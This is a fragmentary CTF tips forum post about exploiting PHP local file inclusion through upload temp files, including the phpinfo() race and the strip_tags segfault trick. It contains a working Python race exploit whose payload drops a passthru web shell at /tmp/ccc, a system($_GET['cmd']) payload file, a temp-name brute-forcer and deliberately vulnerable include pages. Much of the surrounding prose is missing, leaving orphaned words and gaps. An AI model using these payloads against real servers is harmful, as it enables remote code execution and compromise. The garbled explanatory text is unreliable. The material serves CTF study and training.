13-07-2020, 09:31 AM ctf tips & tricks
MtucX












CTF TIPS & TRICKS


ctf

https://www.sec4ever.com/home/showthread.php?t=19843

# LFI WITH TMP FILES

## Understanding PHP temporary files



https://www.php.net/manual/en/features.file-upload.post-method.php

https://www.macs.hw.ac.uk/~hwloidl/d...le-upload.html

POST (and PUT) upload methods; the uploaded file's metadata — including the temp-file path `tmp_name` — is exposed through the `$_FILES` superglobal.







https://arabicprogrammer.com/article/8708534101/

default temp dir

by default

php.ini



d:/phpstudy_pro/temp

; upload_tmp_dir

wamp c:/wamp/tmp

php.ini

ubuntu

:
cat /etc/php/7.0/apache2/php.ini | grep upload_tmp
;upload_tmp_dir =
`upload_tmp_dir` is commented out (unset) by default; when it is unset, or points at a directory the web server cannot write to, PHP falls back to the system default temp directory (see `sys_get_temp_dir()` below).



upload_tmp_dir

temp directory

sys_get_temp_dir()
:
default

C:\Users\lol>php -r "echo sys_get_temp_dir();"
C:\Users\lol\AppData\Local\Temp

edited
   php.ini 

sys_temp_dir = "D:/phpstudy_pro/temp"

C:\Users\lol>php -r "echo sys_get_temp_dir();"
D:/phpstudy_pro/temp
C:\Users\lol>
ubuntu

:
➜ ~ php -r "echo sys_get_temp_dir();"
/tmp
➜  ~
##


temp directory
: Windows names are `php` + 4 characters + `.tmp` (from GetTempFileName()); Linux names are `php` + 6 random characters (from mkstemp())

:


:
 php
<?php
// Ask PHP for an anonymous temp file and print the path it chose; the page
// uses this to observe the runtime's temp directory and naming scheme.
$handle = tmpfile();
$meta = stream_get_meta_data($handle);
print $meta['uri'] . "\n";
windows






php????.tmp

tmp

linux


Linux

php??????






GetTempFileName()
and mkstemp()



https://stackoverflow.com/questions/...-php-generated

https://linux.die.net/man/3/mktemp

https://linux.die.net/man/3/mkstemp

https://stackoverflow.com/questions/...ame-uniqueness

https://github.com/php/php-src/blob/master/main/php_open_temporary_file.c

PHP_LFI_rfc1867_temporary_files




PHP POST.








php

form request

###

php

If PHP crashes (or is killed) while it is still handling the upload request, the cleanup that normally unlinks the temp file never runs, so the file stays behind in the temp directory.

##

1 - lfi


2 - /proc/self/fd/* * 10 . .


3 - FindFirstFile method (Windows targets; see fimap's FindFirstFile exploit below)
fimap

https://github.com/kurobeats/fimap/w...rstFileExploit

## Exploiting time




## LFI With PHPInfo Assistance


https://insomniasec.com/cdn-assets/LFI_With_PHPInfo_Assistance.pdf

http://gynvael.coldwind.pl/download.php?f=PHP_LFI_rfc1867_temporary_files.pdf


local file include
....
phpinfo() استبدال script



:
index.php

php
<?php
// Deliberately vulnerable: an unfiltered GET parameter reaches include(),
// so any local path (including an upload temp file) can be executed.
include($_GET['file']);
?>
:
info.php
php
<?php
// Exposed phpinfo() page: its $_FILES dump reveals the tmp_name of an
// in-flight upload, which the race script below parses out of the response.
phpinfo();
?>
PHP .







upload post phpinfo

LFI


php

This is a race condition: PHP deletes the uploaded temp file as soon as the upload request finishes, so the LFI include must reach the file while that request is still being processed — which is why the script below pads the request headers and fires the include as soon as `tmp_name` appears in the phpinfo() response.



:
python
import requests
import ssl
import socket
import urllib3

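def SubstrFind(resp, toFind):
	"""Return every index at which ``toFind`` occurs in ``resp`` (overlapping hits included).

	``resp`` and ``toFind`` must be of the same type (both ``str`` or both
	``bytes``). An empty or over-long needle yields ``[]``; the original raised
	``IndexError`` on an empty needle (``ord(toFind[0])``).

	Note: the original loop did ``x += len(toFind)`` after a hit, intending to
	skip past the match, but reassigning the loop variable of a
	``for x in range(...)`` has no effect, so overlapping matches were always
	reported. That observed behaviour is preserved here.
	"""
	if not toFind or len(toFind) > len(resp):
		return []

	indexes = []
	pos = resp.find(toFind)
	while pos != -1:
		indexes.append(pos)
		# advance by one, not by len(toFind), to keep the overlapping semantics
		pos = resp.find(toFind, pos + 1)

	return indexes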

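def phpinfo_ext(content):
	"""Extract the marker-tagged text from a page body.

	Finds the first ``"Security Test"`` tag in ``content`` and returns the run
	of characters that follows it up to (not including) the next ``<``.
	Returns ``""`` when the tag is absent.

	Only the first occurrence is needed, so ``str.find`` replaces the
	hand-rolled all-matches search the original called.

	NOTE(review): the start offset is ``tag index + 11`` while the tag is 13
	characters long, so the returned text begins with the tag's last two
	characters (``"st"``). This matches the original script and is kept as-is;
	nothing visible in this listing calls the function.
	"""
	tag = "Security Test"
	index = content.find(tag)
	if index == -1:
		return ""

	start = index + 11
	end = content.find('<', start)
	if end == -1:
		end = len(content)
	return content[start:end]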

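def phpinfo_request(host="127.0.0.1", port=80):
	"""Run one upload-race attempt against /info.php and try to include its temp file.

	Sends a hand-built multipart POST whose file part carries the PHP payload,
	reads the phpinfo() response only until the ``[tmp_name]`` entry of
	``$_FILES`` shows up, and immediately requests
	``http://<host>/index.php?file=<tmp_name>`` through the LFI so the include
	can hit the temp file before PHP removes it at the end of the upload request.

	Args:
		host: target host (default keeps the original hard-coded 127.0.0.1).
		port: target port (default 80; the URL omits ``:80`` as the original did).

	Returns:
		The temp-file path reported by phpinfo(), or ``""`` if none was seen
		(the original always returned ``""`` and printed the path instead; the
		module-level loop prints whatever is returned).

	Side effects:
		Prints ``wait ... `` on a miss. On a hit (the tag shows up in the
		included page) it prints ``done`` and terminates the process with
		``SystemExit(0)`` — the ``while True`` loop at module level relies on
		that. A hit also means the payload has written a web shell to
		``/tmp/ccc`` on the target.

	Fixes over the original: Python 2 ``print`` statement; ``str``/``bytes``
	mixing on the socket and on ``r.content``; ``socket.send`` (may write only
	part of the buffer) replaced by ``sendall``; urllib3's private
	``_new_conn()`` replaced by the already-imported ``socket`` module; a
	guard on the ``[tmp_name]`` line split; the socket is now closed.
	"""
	tag = "Security Test"
	# File-part contents: the tag (so the included page is recognisable) and a
	# one-line PHP stub that drops a tiny command shell at /tmp/ccc.
	payload = (
		"%s\r\n"
		"<?php $c=fopen('/tmp/ccc','w');fwrite($c,'<?php passthru($_GET[\"f\"]);?>');?>\r"
	) % tag
	boundary = "---------------------------7dbff1ded0714"
	# Byte-for-byte the original multipart body (note the closing delimiter
	# ends in a bare "\r", as in the original).
	body = (
		"--%s\r\n"
		'Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r\n'
		"Content-Type: text/plain\r\n"
		"\r\n"
		"%s\n"
		"--%s--\r"
	) % (boundary, payload, boundary)
	body_bytes = body.encode("latin-1")

	padding = "A" * 6000
	# NOTE(review): the oversized headers are presumably there to inflate the
	# phpinfo() page so the part containing [tmp_name] is flushed to us while
	# the upload request is still in flight — see the referenced PDF.
	request = (
		"POST /info.php HTTP/1.1\r\n"
		"Z: %s\r\n"
		"Cookie: othercookie%s\r\n"
		"HTTP_ACCEPT: %s\r\n"
		"HTTP_USER_AGENT: %s\r\n"
		"HTTP_ACCEPT_LANGUAGE: %s\r\n"
		"HTTP_PRAGMA: %s\r\n"
		"Content-Type: multipart/form-data; boundary=%s\r\n"
		"Content-Length: %d\r\n"
		"Host: %s\r\n"
		"\r\n"
	) % ((padding,) * 6 + (boundary, len(body_bytes), host))
	raw = request.encode("latin-1") + body_bytes

	netloc = host if port == 80 else "%s:%d" % (host, port)
	tmp_name = ""
	sock = socket.create_connection((host, port))
	try:
		sock.sendall(raw)

		# Read only until [tmp_name] is visible; the rest of the page is not needed.
		resp = b""
		while b"tmp_name" not in resp:
			chunk = sock.recv(4096)
			if not chunk:
				break
			resp += chunk

		for line in resp.decode("latin-1").split("\n"):
			if "tmp_name]" in line:
				# phpinfo prints the entry as "[tmp_name] => /tmp/phpXXXXXX"
				fields = line.split()
				if len(fields) > 2:
					tmp_name = fields[2]
				break

		if tmp_name:
			tmp_url = "http://%s/index.php?file=%s" % (netloc, tmp_name)
			# Bounded wait so a stalled include cannot hang the race loop.
			page = requests.get(tmp_url, timeout=10).text
			if tag in page:
				print("done")
				raise SystemExit(0)
			print("wait ... ")
	finally:
		# NOTE(review): closed only after the include attempt. The original never
		# closed the socket explicitly; closing it before the include would
		# presumably let the upload request finish early, and with it end the
		# temp file's lifetime.
		sock.close()

	return tmp_name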
		


# Keep racing; phpinfo_request() terminates the process itself on a hit.
while 1:
	print(phpinfo_request())
:
 bash
sudo inotifywait -m -r /tmp



ccc — the `/tmp/ccc` shell written by the payload shows up in the inotifywait output once the include has succeeded.








ctf challenge : https://h4dla3.github.io/post/eagle-jump/

docker container : https://github.com/vulhub/vulhub/tree/master/php/inclusion


## ( php7 segmentation fault ) using php://filter/string.strip_tags


https://bugs.php.net/bug.php?id=75535

php

php7.0.0-7.1.2

php7.1.3-7.2.1

php7.2.2-7.2.8


lfi
php://filter/string.strip_tags
php
crash

( )


upload_tmp_dir
directory
.


segmentation fault — a null pointer dereference


. `atoi(NULL)`









crash






:
php
<?php
// Deliberately vulnerable: an unfiltered GET parameter reaches include(),
// so any local path (including a leftover upload temp file) can be executed.
include($_GET['file']);
?>

browser





















:
mtucx.txt

php
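<?php
// Marker + command execution: the brute-force script below looks for 'mtucx'
// in the response to know that the include hit this file.
echo 'mtucx';
system($_GET['cmd']);
// Fixed closing tag: the original ended with a bare ">", which is a parse error
// and would make the include fail instead of executing the payload.
?>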




2

crash







tmp filename



burp, wfuzz, gobuster, dirbuster, etc. Note the size of the space: 62 alphanumerics over 6 positions is 62^6 ≈ 5.7 × 10^10 names, so blind guessing is only practical when something narrows it — a directory listing such as dir.php below, /proc/self/fd, or a crash that leaves the file in place.











python استبدال script
:
python
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests, random
import datetime

# 62 characters, [a-zA-Z0-9]: the alphabet the page gives for the six random
# characters PHP (via mkstemp()) appends to "php" in a Linux temp-file name.
charset = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"

# Target root; the vulnerable include is reached at <base_url>/index.php?lfi=...
base_url = "http://127.0.0.1"

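def get_filename(length=6):
    """Return a random candidate suffix for a PHP temp-file name.

    Draws ``length`` characters (default 6, the Linux ``php??????`` form
    described above) from ``[A-Za-z0-9]`` — the same 62-character alphabet as
    the module-level ``charset``, taken from ``string`` so the function does not
    depend on that global. ``random`` is used deliberately: this is a guess
    generator, not a security token. Guesses are independent and may repeat;
    for a systematic sweep use a wordlist tool as the page suggests.
    """
    import string

    alphabet = string.ascii_letters + string.digits
    return "".join(random.choice(alphabet) for _ in range(length))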

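def brute_force_tmp_files():
    """Try one random ``/tmp/php??????`` name through the LFI and stop on a hit.

    Requests ``<base_url>/index.php?lfi=/tmp/php<guess>`` and looks for the
    ``mtucx`` marker that the planted mtucx.txt echoes. On a hit it prints the
    URL and terminates the process with ``SystemExit(0)`` — ``main()``'s loop
    relies on that.

    Returns:
        False on a miss or a request-layer failure (the hit path exits).

    Only ``requests.RequestException`` is swallowed; the original
    ``except Exception: pass`` also hid programming errors such as the
    Python 2 ``print`` statement it contained.
    """
    guess = "php" + get_filename()
    url = "{}/index.php?lfi=/tmp/{}".format(base_url, guess)
    print(guess)
    try:
        # Bounded wait so one stalled request cannot hang the brute force.
        resp = requests.get(url, timeout=10)
    except requests.RequestException:
        # Connection problems are expected noise over a long run.
        return False

    if 'mtucx' in resp.text:
        print("[+] Include success!")
        print(url)
        raise SystemExit(0)
    return False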


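def main():
    """Loop forever over random temp-file guesses.

    ``brute_force_tmp_files()`` terminates the process itself on a hit. The
    unused ``flag`` local and the redundant ``pass`` of the original are gone.
    """
    while True:
        brute_force_tmp_files()


if __name__ == "__main__":
    main()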
burpsuite
burpsuite






....



# ctf

fuzz



dir.php







md5 ==

pass=md5(??)&







:
bash
C:\Users\lol\Desktop\ffuf_1.0.2_windows_amd64>python -c "print len('fa25e54758d5d5c1927781a6ede89f8a')"
32

C:\Users\lol\Desktop\ffuf_1.0.2_windows_amd64>

32 characters — the length of a hex-encoded MD5 digest, consistent with `pass=md5(...)`.





redirect
flflflflag.php





lfi

php://filter/convert.base64-encode/resource=



:
http://61da71ac-e4d7-4eac-96c2-58cbde529147.node3.buuoj.cn/flflflflag.php?file=php://filter/convert.base64-encode/resource=flflflflag.php

http://61da71ac-e4d7-4eac-96c2-58cbde529147.node3.buuoj.cn/flflflflag.php?file=php://filter/convert.base64-encode/resource=dir.php

decode base64

:
php
flflflflag.php

<?php
$file=$_GET['file'];
// Blocklist only: the data:, php://input and zip:// wrappers are rejected
// (case-insensitive), but php://filter and plain /tmp paths pass through.
if(preg_match('/data|input|zip/is',$file)){
	die('nonono');
}
// "@" suppresses include warnings, so a missed guess produces no error output.
@include($file);
echo 'include($_GET["file"])';
?>

dir.php

<?php
// Lists /tmp, the default temp directory where upload temp files land. scandir()
// is still callable here: the page's disable_functions list spells it "scadnir".
var_dump(scandir('/tmp'));
flflflflag.php
flflflflag.php rejects the data:, php://input and zip:// wrappers (hence the `nonono`); dir.php lists the /tmp directory, i.e. the default temp directory where upload temp files land.













dir.php




include



disable function

:
disable_functions pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld,mail,scadnir,readfile,show_source,fpassthru,readdir
Note: the list contains `scadnir` (misspelt), so `scandir()` is still callable — which is why dir.php can list /tmp — while `readfile`/`show_source`/`fpassthru` are disabled, forcing the php://filter base64 route to read source. `eval` is a language construct rather than a function and cannot be switched off through disable_functions.








## 3 ( convert.quoted-printable-encode )


...
